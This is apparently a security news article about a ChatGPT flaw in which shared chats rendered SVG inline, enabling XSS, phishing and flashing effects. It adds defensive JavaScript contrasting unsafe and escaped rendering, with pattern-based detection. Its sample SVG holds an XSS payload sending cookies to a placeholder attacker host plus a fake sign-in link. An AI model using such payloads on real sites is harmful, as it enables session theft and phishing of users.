ChatGPT Flaw Exposes Users to Malicious Image Attacks
A newly disclosed vulnerability in OpenAI's ChatGPT allows an attacker to embed malicious SVG image files in a conversation and then share it, so that anyone who opens the shared link is exposed to HTML injection and cross-site scripting (XSS), phishing content dressed up as part of the chat, and potentially harmful visual effects. Tracked as CVE-2025-43714, the flaw affects ChatGPT versions through March 30, 2025.
Security researchers found that ChatGPT rendered SVG markup inline, as part of the page, instead of displaying it as text inside a code block. Because an inlined SVG becomes part of the page's DOM, any script elements, event handlers or embedded HTML it carries run in the browser of whoever reopens the shared chat, turning a benign-looking message into an active attack.
Unlike raster formats such as PNG or JPEG, SVG is an XML document, and the SVG specification allows it to carry script elements, event-handler attributes such as onload, hyperlinks, and arbitrary HTML via the foreignObject element. A malicious payload can therefore display deceptive messages inside the chat, or use SVG animation to produce rapidly flashing visual effects that pose a risk to photosensitive individuals. Note that browsers do not run scripts in an SVG loaded through an img element; the danger arises specifically when the markup is inserted directly into the page.
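As an added illustration (not OpenAI's code, and not taken from the original report), the JavaScript below contrasts the inline rendering the article describes with the code-block rendering it calls for, and flags the SVG constructs that make inlining dangerous. The sample SVG, the benign SVG and the attacker.example hostname are constructed for this example; it runs in Node without a browser because it only manipulates the markup as strings.

```javascript
// Added example, not OpenAI's code: contrasts inlining attacker-controlled
// SVG into a page (the behaviour the article attributes to ChatGPT) with
// rendering the same SVG as an escaped code block, and flags the SVG
// constructs that make inlining dangerous.

// Constructed sample SVG carrying the kinds of payload the article mentions:
// a load handler, a script element, HTML via foreignObject (phishing text),
// and a rapidly flashing animation. Hostnames are placeholders.
const SAMPLE_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200"
     onload="alert(document.domain)">
  <script>fetch('https://attacker.example/c?d=' + document.cookie)</script>
  <foreignObject width="100%" height="100%">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <a href="https://attacker.example/login">Your session expired, sign in again</a>
    </body>
  </foreignObject>
  <animate attributeName="fill" values="#fff;#000" dur="0.1s" repeatCount="indefinite"/>
</svg>`;

// Constructed benign SVG for comparison: plain shapes, no scripts, handlers or links.
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="teal"/>
</svg>`;

// Unsafe rendering: the SVG text is concatenated into the page markup, so
// the browser parses it as live DOM in the hosting site's origin.
function renderInline(svgText) {
  return `<div class="message">${svgText}</div>`;
}

// Escape the five characters that let text be parsed as HTML.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Safe rendering: the SVG is shown as source inside a code block. Because
// every '<' is escaped, nothing in it can become an element or attribute.
function renderAsCodeBlock(svgText) {
  return `<pre><code class="language-svg">${escapeHtml(svgText)}</code></pre>`;
}

// Constructs that make an inlined SVG active or misleading. Regex matching is
// a triage aid for reviewers, not a sanitizer: entity encoding, odd casing and
// namespace tricks can evade it, which is why rendering as text beats trying
// to filter the markup.
const ACTIVE_CONTENT_PATTERNS = {
  script:            /<script\b/i,
  eventHandler:      /\son[a-z]+\s*=/i,
  foreignObject:     /<foreignObject\b/i,
  javascriptUrl:     /\b(?:xlink:)?href\s*=\s*["']?\s*javascript:/i,
  externalLink:      /\b(?:xlink:)?href\s*=\s*["']?\s*https?:/i,
  flashingAnimation: /<(?:animate|set)\b[^>]*repeatCount\s*=\s*["']indefinite["']/i,
};

// Returns the names of the patterns that match, in declaration order.
function findActiveContent(svgText) {
  return Object.entries(ACTIVE_CONTENT_PATTERNS)
    .filter(([, re]) => re.test(svgText))
    .map(([name]) => name);
}

// True if any element name from the input SVG survives as an unescaped tag
// in the rendered HTML, i.e. the browser would parse it as markup.
function leaksRawTags(renderedHtml, svgText) {
  const names = new Set((svgText.match(/<([a-zA-Z][\w:-]*)/g) || []).map((t) => t.slice(1)));
  return [...names].some((n) => new RegExp(`<${n}[\\s>/]`).test(renderedHtml));
}

console.log('flagged in sample:', findActiveContent(SAMPLE_SVG));
console.log('flagged in benign:', findActiveContent(BENIGN_SVG));
console.log('inline leaks tags:', leaksRawTags(renderInline(SAMPLE_SVG), SAMPLE_SVG));
console.log('code block leaks tags:', leaksRawTags(renderAsCodeBlock(SAMPLE_SVG), SAMPLE_SVG));
```

The triage scanner is deliberately kept separate from the rendering path: the fix that closes this class of bug is `renderAsCodeBlock`, which needs no knowledge of which SVG features are dangerous, whereas any allow-list or pattern filter applied before `renderInline` would have to keep pace with every browser feature that can execute or mislead.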
OpenAI has responded by disabling chat link sharing but has yet to ship a complete fix. Until it does, users are advised to avoid opening shared ChatGPT links from untrusted sources, and developers of similar chat interfaces should treat any SVG supplied by a user as text to be escaped and displayed, never as markup to be inserted into the page.
